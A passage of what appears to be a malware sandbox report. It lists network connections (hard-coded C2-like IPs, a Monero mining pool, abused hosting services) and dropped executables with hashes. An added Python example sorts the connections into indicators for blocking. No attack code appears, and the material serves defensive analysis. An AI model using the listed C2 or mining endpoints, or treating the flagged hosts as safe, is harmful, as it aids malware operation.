| NL | 81.161.229.93:80 | 81.161.229.93 | tcp |
| US | 8.8.8.8:53 | 93.229.161.81.in-addr.arpa | udp |
| FI | 77.91.124.71:4341 | | tcp |
| US | 8.8.8.8:53 | 71.124.91.77.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| DE | 148.251.234.93:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | stim.graspalace.com | udp |
| US | 188.114.97.0:80 | stim.graspalace.com | tcp |
| US | 8.8.8.8:53 | 93.234.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| BG | 171.22.28.213:80 | 171.22.28.213 | tcp |
| US | 8.8.8.8:53 | 213.28.22.171.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | | tcp |
| FI | 77.91.124.86:19084 | | tcp |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | | tcp |
| FI | 77.91.68.29:80 | 77.91.68.29 | tcp |
| FI | 77.91.124.86:19084 | | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| US | 95.214.26.28:80 | host-host-file8.com | tcp |
| US | 8.8.8.8:53 | 28.26.214.95.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | | tcp |
| FI | 77.91.124.86:19084 | | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| NL | 194.169.175.235:42691 | | tcp |
| US | 8.8.8.8:53 | 3665ca3d-3cc3-4552-b9f4-949b27dcf817.uuid.datadumpcloud.org | udp |
| US | 8.8.8.8:53 | 235.175.169.194.in-addr.arpa | udp |
| FI | 77.91.124.86:19084 | | tcp |
| FI | 77.91.124.86:19084 | | tcp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| NL | 51.15.58.224:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | server13.datadumpcloud.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| IN | 172.253.121.127:19302 | stun2.l.google.com | udp |
| BG | 185.82.216.104:443 | server13.datadumpcloud.org | tcp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.121.253.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.58.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| US | 188.114.96.0:443 | walkinglate.com | tcp |
| FI | 77.91.124.86:19084 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| DE | 51.68.190.80:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 104.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.68.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | tcp |
| NL | 142.250.179.194:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| BG | 185.82.216.104:443 | server13.datadumpcloud.org | tcp |
| FI | 77.91.124.86:19084 | | tcp |
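The network table mixes three kinds of rows: reverse-DNS and forward lookups to 8.8.8.8, browser background traffic to Microsoft, Google and Facebook properties (Edge is spawned late in the listing), and the sample's own traffic, which is mostly to bare IP addresses on high ports (77.91.124.86:19084 over and over, 194.169.175.235:42691) plus a handful of public services that the report's signatures flag as abused hosting (cdn.discordapp.com, pastebin.com, iplogger.com) and a connection to xmr-eu1.nanopool.org on 14433. The export also renders a row with an empty Domain cell by letting the protocol slide left into the Domain column. The Python below is an added example, not part of the report: it parses rows copied from the table (including one in the misaligned form), repairs that shift, and sorts connections into the buckets an analyst would block or hunt on. The hosting-service set and the mining-pool name heuristic are this example's assumptions, not something the report states.

```python
"""Turn the Network table above into blockable indicators.

Added example, not part of the sandbox report.  ROWS is copied from the table;
HOSTING_SERVICES and the mining-pool heuristic are this example's assumptions."""
import ipaddress

# Rows copied from the Network table above (a subset; one row kept in the
# misaligned form the export uses when the Domain cell is empty).
ROWS = """\
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| FI | 77.91.124.86:19084 | | tcp |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | 1.124.91.77.in-addr.arpa | udp |
| NL | 194.169.175.235:42691 | tcp | |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| NL | 51.15.58.224:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
"""

# Services the report's own signature calls legitimate hosting abused for
# malware hosting/C2; membership of this set is the example's assumption.
HOSTING_SERVICES = {"cdn.discordapp.com", "pastebin.com", "iplogger.com"}
STANDARD_PORTS = {53, 80, 443}


def parse_rows(text):
    """Return [(country, ip, port, domain, proto)] for each table row.

    Accepts both the 4-cell row and the misaligned row in which an empty
    Domain cell let the protocol slide into the Domain column."""
    records = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) < 3 or not cells[1]:
            continue
        country, dest = cells[0], cells[1]
        if cells[2] in ("tcp", "udp"):            # protocol landed in Domain column
            domain, proto = "", cells[2]
        else:
            domain, proto = cells[2], (cells[3] if len(cells) > 3 else "")
        ip, port = dest.rsplit(":", 1)
        records.append((country, ip, int(port), domain, proto))
    return records


def classify(records):
    """Sort connection records into the buckets an analyst blocks or hunts on."""
    out = {"dns_queries": set(), "direct_ip": set(), "nonstandard_ports": set(),
           "hosting_services": set(), "mining_pool_heuristic": set()}
    for _country, ip, port, domain, proto in records:
        if proto == "udp" and port == 53:          # resolver traffic, keep names only
            if not domain.endswith(".in-addr.arpa"):
                out["dns_queries"].add(domain)
            continue
        if ipaddress.ip_address(ip).is_multicast:  # mDNS noise, not the sample
            continue
        dest = f"{ip}:{port}"
        if domain in ("", ip):                    # no hostname: hard-coded address
            out["direct_ip"].add(dest)
        if port not in STANDARD_PORTS:
            out["nonstandard_ports"].add(dest)
        if domain in HOSTING_SERVICES:
            out["hosting_services"].add(f"{domain} ({dest})")
        if "pool" in domain or domain.startswith("xmr"):   # heuristic, assumption
            out["mining_pool_heuristic"].add(f"{domain} ({dest})")
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for bucket, items in classify(parse_rows(ROWS)).items():
        print(f"{bucket}: {items}")
```

The direct-IP bucket is the one to act on first: those endpoints have no DNS name to sinkhole, so they go straight into egress deny rules, while the hosting-service hits need content-level handling rather than a domain block.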
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mK1XA25.exe
| MD5 | 45c070db952b920b2564fb09653b050f |
| SHA1 | 95f02426bd86ecd8af5a5f7eaa947d9e739ea722 |
| SHA256 | 3f7aa7a0a753e93e66ee6d752e218777de63e3a40559bf6faabf5576fa0da3eb |
| SHA512 | 06579be6f6d7465e9533bedd12dcd1a44c538396c78a0f34abd9f73162a10359736e3e6a988b7736802d10fa7b9272579647df341bee5a1c3c70683d4ec5f464 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ma9cL62.exe
| MD5 | 731804f286ac23b62c6951e391295dc3 |
| SHA1 | 8ce9a489bbe074442b0039b6e83e1b1010761c96 |
| SHA256 | 07b9a6f0b74d7083daab9dbd86faaa99341f5b7fe7f09c2bf00b4b0c1ca9d384 |
| SHA512 | 08e02ad30de3d3aa3de995262a338229f78d43f30a0b030dfa7b2bd592e70d5e91fbd082b765075366b79fdf2352a90c9e348531aa9095d0ad5a18849e04537c |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jy3uO78.exe
| MD5 | 4b71097cb66757380b5ec0a38c2d94ba |
| SHA1 | caa6264beb33a03d7c48a7161f7ee31165325149 |
| SHA256 | d8dde65c2b2dd28a17679b543ba68a44d16cd6425d660ed2fb3cec04dc48a13a |
| SHA512 | 53529523bbd921f2714929da1627e5678b1762a67d6307c0dd9d359f8f534b867c76ba40a678179a1551166e883acad8b378dd0ba1424e78b082e2f9f27216bc |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\uV6dJ08.exe
| MD5 | 36024673cee80572094007a7ba08f777 |
| SHA1 | 3064cf2839d807bf51504e310f04f74bbb34bf0a |
| SHA256 | b3bc9835cbe05e8b7123c4732755b484d123251d47b9c10c8bd81d48602fc0c9 |
| SHA512 | 0c7b6546689369f0ea72f596b0b5154f566bd362749da7bd43985c56d60b56b42d51fafe6684ae3aeda10bc74c0f95753e90b10f519026e4a57844e28c9e30f3 |
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\eO1iD34.exe
| MD5 | 5591fa6d152b131e005b9ed6b89ed840 |
| SHA1 | f82e64e762cea9931fb1cfe0cb2d9d9e7967fbc8 |
| SHA256 | 08e5c77bc79c414a0a179c195938ddc4adf18cf5d611872cc64946641d2eea9b |
| SHA512 | 8e610d5630bf4184458991accadaee184497d46bf8f28991236f26fc11f34e12b5b20b4f5a762056f2fbc3863d661b06c4673500624028b3579358ba4ac0ed96 |
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oE77FI0.exe
| MD5 | 6dec1233e7b5edaf74e4dc71803ab6b4 |
| SHA1 | 99d93d0d63b295755f5e8d6cf0c272e68224c8e0 |
| SHA256 | dbf4029ba1fda3b3cecbdcd0898ae28595b3e3560c183250122eefb5b33fcd75 |
| SHA512 | 1f9390ac5636c742cd605e2864091366df52aea0fdc6172323b0d4110a760b7a201761033f3619afd13b9bc938a755c1bdfe761d5e856d55e8876e1d6eea6766 |
memory/4812-42-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ov9153.exe
| MD5 | 9046d6452dc56f767b5634b91984df5b |
| SHA1 | 2652f44290e9aa986150c1d8ab0ebfd09dbaedfc |
| SHA256 | 065c2a915f5d18dff55ae9638fe2cfd99cdbb56bad37a6e62972d41180b53d01 |
| SHA512 | fed245375b595b7a1a66bcf91cbc9407fbaa3f35ae7c270879dea494fce8a7b144a6d293af8e4416ae09477edfb2caeb929c87eaaa4ffad4077bb8a63d4fe5b9 |
memory/4812-46-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/1844-47-0x0000000000400000-0x0000000000434000-memory.dmp
memory/1844-48-0x0000000000400000-0x0000000000434000-memory.dmp
memory/1844-49-0x0000000000400000-0x0000000000434000-memory.dmp
memory/1844-51-0x0000000000400000-0x0000000000434000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3KQ75Fv.exe
| MD5 | 18e8cb54afe4297f575b8e36f8435507 |
| SHA1 | f3d37745532e8d3a927e643cd4254241643592ce |
| SHA256 | a09a41030a60089ba2d75eabd36803245a8c0d440091f051e852c8c77cbd32ce |
| SHA512 | 3dae2b0dc9f7586a9f1178ab79af188657ffbccc94d8aae28ed62ff4c5e3904fceecc5cbd9e542bd4d00a27b7e67ee67a33d73a185b420d80e148e4922ff1f19 |
memory/4800-54-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4812-57-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/3320-56-0x0000000000F20000-0x0000000000F36000-memory.dmp
memory/4800-58-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4OS609Ye.exe
| MD5 | 7314f5a7e85457f5c2158ec8284a4b68 |
| SHA1 | d0fe48e2652816ab7a1177424827a626d055f57e |
| SHA256 | 233f77d91996d0dfc883f9610e6ff108c3f6295cfbe9f03f934b1ebbba4c506e |
| SHA512 | 8ce8ab0a9ee2aa98a2d2a4388050f968ab0d8315b4f35843e12859fab373365989370a0ebc6f6fab178f694738d6e29241ff5ef4e76ba6c83c913bf0903e44b3 |
memory/4812-65-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/3320-66-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-68-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-69-0x0000000002D40000-0x0000000002D50000-memory.dmp
memory/3320-71-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-70-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-67-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-73-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-72-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-74-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-76-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-77-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-78-0x0000000007F00000-0x0000000007F10000-memory.dmp
memory/3320-79-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-80-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-83-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-81-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-85-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-87-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-88-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-90-0x0000000007F00000-0x0000000007F10000-memory.dmp
memory/3320-91-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-92-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-93-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-89-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-95-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-97-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/3320-98-0x0000000002D20000-0x0000000002D30000-memory.dmp
memory/1360-99-0x0000000000400000-0x000000000043E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
| MD5 | 916851e072fbabc4796d8916c5131092 |
| SHA1 | d48a602229a690c512d5fdaf4c8d77547a88e7a2 |
| SHA256 | 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d |
| SHA512 | 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521 |
memory/1360-103-0x0000000074530000-0x0000000074CE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ie7PL4.exe
| MD5 | 485ca334a9cccf3c67f3bc2f5818e438 |
| SHA1 | 70677dc0b2375fbbdd03be0aa74961a48161fb1d |
| SHA256 | 63736f770cf2740fcd586d6cff9e01fe836bcbe7708dbb69d3b2bd81be207d02 |
| SHA512 | 80bdf4e716e55ee05a89f03c00b81c67e83550d6f7eb5f4cb9c839baacf13b2be1ce006899131f183f9e7c2f9b3bd47b750098855df26a3044f8d4f138fba7e3 |
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
| MD5 | 485ca334a9cccf3c67f3bc2f5818e438 |
| SHA1 | 70677dc0b2375fbbdd03be0aa74961a48161fb1d |
| SHA256 | 63736f770cf2740fcd586d6cff9e01fe836bcbe7708dbb69d3b2bd81be207d02 |
| SHA512 | 80bdf4e716e55ee05a89f03c00b81c67e83550d6f7eb5f4cb9c839baacf13b2be1ce006899131f183f9e7c2f9b3bd47b750098855df26a3044f8d4f138fba7e3 |
memory/1360-107-0x0000000007C70000-0x0000000008214000-memory.dmp
memory/1360-108-0x00000000077A0000-0x0000000007832000-memory.dmp
memory/1360-110-0x0000000007770000-0x0000000007780000-memory.dmp
memory/1360-114-0x0000000007970000-0x000000000797A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6DA5dP6.exe
| MD5 | f87b7e6becd44618753e035967c8bc97 |
| SHA1 | 85be3124ab32215ec98b2e28239c743d3c47bb65 |
| SHA256 | 081b4842b5f44def9feaedb09130cd43a53b0c6c009e87318f9135705b258398 |
| SHA512 | b9e72eaaf00d26050425a0758a8e6725544336c4ece254b491288041f30396813bcb5a54e57dccab115d324dcf5e2287c5f4410a0e17f3635f767b227e84c1d8 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7IN1gt02.exe
| MD5 | f618643bee2aa9e0e4638eef2c79c7f9 |
| SHA1 | 42386067fea65158cf37c37205480c75c1f720ab |
| SHA256 | e04b98a1ec88ebed5aafc755de5d358205e5f808fbc0c3c9644b5d0342b92113 |
| SHA512 | 8ff98362ff36d92be50a3c22f1f41ab57b287f161b214d03db490dc18f83c8afd6deb25913b2a71ab077f69f2ccd9769b43a5d1f4c2fb8027ab81c07f43edbc4 |
memory/1360-125-0x0000000008840000-0x0000000008E58000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1DA5.tmp\1DB5.tmp\1DB6.bat
| MD5 | 376a9f688d0224a448db8acbf154f0dc |
| SHA1 | 4b36f19dc23654c9333289c37e454fe09ea28ab5 |
| SHA256 | 7bdbf8bb79af152874b51f1a3c724d24070d0631d6c4c59102b60da022f4a31a |
| SHA512 | a5aea84abd1271c92538f9262c7ca38ce5e52ef3edf697dc1442db68565751d9401da9bb9f78a52e7330451d55ed6ad4ea9b1a5835bdff7f2afab15362bf694b |
memory/1360-127-0x0000000007B10000-0x0000000007C1A000-memory.dmp
memory/1360-128-0x0000000007A40000-0x0000000007A52000-memory.dmp
memory/1360-129-0x0000000007AA0000-0x0000000007ADC000-memory.dmp
memory/1360-130-0x0000000007C20000-0x0000000007C6C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e9a87c8dba0154bb9bef5be9c239bf17 |
| SHA1 | 1c653df4130926b5a1dcab0b111066c006ac82ab |
| SHA256 | 5071c9de822e09f2182f66ab806551c02f87e20d160a4923ca1d9763194f2cb5 |
| SHA512 | bb4f876fc8a88e480d2d82062b003d2769b75a6cb1a960173bd6b34925a27b1189402677d9124b6445ded6edc3a07ff0e314b71150684e96bc6614185c2e2f49 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f4787679d96bf7263d9a34ce31dea7e4 |
| SHA1 | ebbade52b0a07d888ae0221ad89081902e6e7f1b |
| SHA256 | bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87 |
| SHA512 | de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307 |
\??\pipe\LOCAL\crashpad_3468_KFSGNZYXEDYGLHNN
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\pipe\LOCAL\crashpad_4808_WAPZWYUYOJXSFSED
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\pipe\LOCAL\crashpad_2104_WHRVNUXTBJIZFVUB
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 07c0799f041fd561622f5b4e5d4651e6 |
| SHA1 | 93b1da78852b003864a9e6587e790284a4b69af6 |
| SHA256 | 58706f7ec054dce1e89234f3a642d563650818ad2058edf0507cc92055e5f6b6 |
| SHA512 | c9a04ce1022d0250b587791144abac99948bd8821837892c595344fe8450eb709bdfd27a73c0cc02b6166f3512499560d471da43e5decba50c05be8cbb5d42d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6cafafdc33f9ebbe3a7167e77f2eb7cc |
| SHA1 | e6d20199ebba7b986b015e853356659f3c2f467c |
| SHA256 | ac417c9c51fc9aebdfbeeda04c913b9c6fab8845de9435dc81885f30ba149033 |
| SHA512 | 236495b61dd715d554d6a193bd2a767ce86342a7c0d7148c304c7c7f28d212a92c00d104a52b9e0e823d3b2c953ff4950398e61e2987693e9f5a988fae5460ad |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 71317137404ee085e72fbf81365e6b27 |
| SHA1 | b785d9c4895c3f7434005c98457797b291653ac7 |
| SHA256 | 0e6f479d1deb2e12dd1301e543b44f8d900cdb2832085a9a2b99ac924d773463 |
| SHA512 | 94401512327e63458d4a7b8cd28834f613d0198c659d2a4bad1857e4727ff0a6f62aedadb60b1d9eec3807042c81c108435fbe2c9236cbca2dc605e0582da1f3 |
memory/1360-223-0x0000000074530000-0x0000000074CE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4532.exe
| MD5 | 107010beec076341ed4728108616ae14 |
| SHA1 | d521c427abf30e3dea44b2e3a6715310b13d5236 |
| SHA256 | a68c5e94f561ee7f4e5edc6e64db2ccc6083a9a34acd478da0b5a3003a233e52 |
| SHA512 | c3646f0d843750387e5b839247777ae8ad2ac09c8a421f5f51f9da537de753fbe2598b172e704a1e80265305f08c66cd5e60130cbaca52774bc0451ab032ca78 |
C:\Users\Admin\AppData\Local\Temp\45FE.exe
| MD5 | e561df80d8920ae9b152ddddefd13c7c |
| SHA1 | 0d020453f62d2188f7a0e55442af5d75e16e7caf |
| SHA256 | 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea |
| SHA512 | a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6nn31zD.exe
| MD5 | 98a2734462446ebf5db975552f8c3c8e |
| SHA1 | c75f3c8fbe8525612e77567a0ecd9ecb64cc661c |
| SHA256 | 910708cc129975a0a98380675d997f51d329d0dec207f7dfcf0b1bb894169742 |
| SHA512 | a262383efa2c8444ee57f40a5ffe7fd6ea4d837ae4104b28f573a7e5ceb094aeafba81b64be8eb52dd8dcb14f786a17e4afbb6b144f64731bd860abe6f31a46e |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vS3cv7Ny.exe
| MD5 | 5e5e0f3b6bd23c17863a01d7e4439671 |
| SHA1 | 2ac6bbedefd43a4fb1acb1b86982ff19ea5ffe8a |
| SHA256 | db3f5deaf908591e151bdb9b23661598a8e6fb49973908c3fcea984b53897aab |
| SHA512 | 545ca59ef97f0dc4b3ca7830e58a7845915048fc8fffa365d7b3d555f77942cd5c906f4cad384c169c1ca511f3e50a31a8a4a36a101ac6069f2f469faef6e89a |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\md5uC1Kk.exe
| MD5 | e7f0ff0fc5d8ea2d182ae44634559875 |
| SHA1 | a7b2e67408a3f1d28d494c8a28089ca6347e3bff |
| SHA256 | d30cdc5c8dcc4fae16924de9e07d71de570b81aa8f8746fad42c4193dee99154 |
| SHA512 | cab1b57bd4ee2f32c71f9b787bc150bbfc9aeb103d1b636cbec572d543f6056b49ace8fd84a7c4d34499abcaae06a6fa4462d14a1c7a6e0e52be481c8dac729c |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Lk719Ok.exe
| MD5 | 7314f5a7e85457f5c2158ec8284a4b68 |
| SHA1 | d0fe48e2652816ab7a1177424827a626d055f57e |
| SHA256 | 233f77d91996d0dfc883f9610e6ff108c3f6295cfbe9f03f934b1ebbba4c506e |
| SHA512 | 8ce8ab0a9ee2aa98a2d2a4388050f968ab0d8315b4f35843e12859fab373365989370a0ebc6f6fab178f694738d6e29241ff5ef4e76ba6c83c913bf0903e44b3 |
C:\Users\Admin\AppData\Local\Temp\47E3.bat
| MD5 | e3df28bbdec9b43526669c0648443dbf |
| SHA1 | 81bbb1c5aea563f91bce61cf79f3cfc7f69d760d |
| SHA256 | 7b573c1cbda5ff15ce7ec01d2d7cc7f0cb6989ac833d257d3f8e6e7a61b24ddc |
| SHA512 | fa2f26347174e260b09e6b7e035e6ff2a9dc0293c886255db3a19927ee35df4b318b712f3366bbf8f0f814cfde08bf60c81c639f2f345e3714f6110b9bc33f62 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ig9ND9Br.exe
| MD5 | ee6710d772b4fa041ae3a6f57e8d7c05 |
| SHA1 | 92345b8a2ece6d56842520922dd9f656cf347e96 |
| SHA256 | 73b205f448b646e118fbaf2b64497d60ae79e7c528f69dda34aef6028ef91698 |
| SHA512 | d200796376d83c7723e3a041e5a30f5e07849ced11f313b5d51f0752e2e5fb85d225bb7ffc6f309408444adb9db881e1325e8428374e44980de42f1763033d0c |
C:\Users\Admin\AppData\Local\Temp\493C.exe
| MD5 | 73089952a99d24a37d9219c4e30decde |
| SHA1 | 8dfa37723afc72f1728ec83f676ffeac9102f8bd |
| SHA256 | 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60 |
| SHA512 | 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2 |
memory/5288-331-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5752-349-0x00000000008C0000-0x00000000008CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Ea32tu8.exe
| MD5 | 9046d6452dc56f767b5634b91984df5b |
| SHA1 | 2652f44290e9aa986150c1d8ab0ebfd09dbaedfc |
| SHA256 | 065c2a915f5d18dff55ae9638fe2cfd99cdbb56bad37a6e62972d41180b53d01 |
| SHA512 | fed245375b595b7a1a66bcf91cbc9407fbaa3f35ae7c270879dea494fce8a7b144a6d293af8e4416ae09477edfb2caeb929c87eaaa4ffad4077bb8a63d4fe5b9 |
memory/5752-351-0x0000000074530000-0x0000000074CE0000-memory.dmp
memory/5288-354-0x00000000070A0000-0x00000000070B0000-memory.dmp
memory/5836-358-0x0000000000400000-0x000000000047E000-memory.dmp
memory/5836-359-0x0000000000550000-0x00000000005AA000-memory.dmp
memory/5836-364-0x0000000074530000-0x0000000074CE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 22abd056c5644fbba471fb012fade977 |
| SHA1 | 6a226f4a66a912248d7a8a4b43afad7c944e7dd4 |
| SHA256 | 8ab508b5349e7ccc679b8ea80af86ecd2a936bdac423d413e8d6fd69150babb8 |
| SHA512 | 1232252a069948c214a7af1de97eaee85f9c391e76b2638de6a20d24a8fc4c0132cbe3f83464f0ad09720ab9c6ed8cea57b3cccc59d78572a6a908bd56577758 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 3a748249c8b0e04e77ad0d6723e564ff |
| SHA1 | 5c4cc0e5453c13ffc91f259ccb36acfb3d3fa729 |
| SHA256 | f98f5543c33c0b85b191bb85718ee7845982275130da1f09e904d220f1c6ceed |
| SHA512 | 53254db3efd9c075e4f24a915e0963563ce4df26d4771925199a605cd111ae5025a65f778b4d4ed8a9b3e83b558066cd314f37b84115d4d24c58207760174af2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4fc15d0cc61569727482f7d73ff74dd1 |
| SHA1 | 84bfd1642143e2bc8e256ee3bf604926c47a1c49 |
| SHA256 | b6bcd108dc56cb91c3889195edf90ba92d708901ced7b968c7cddad3a4376ec7 |
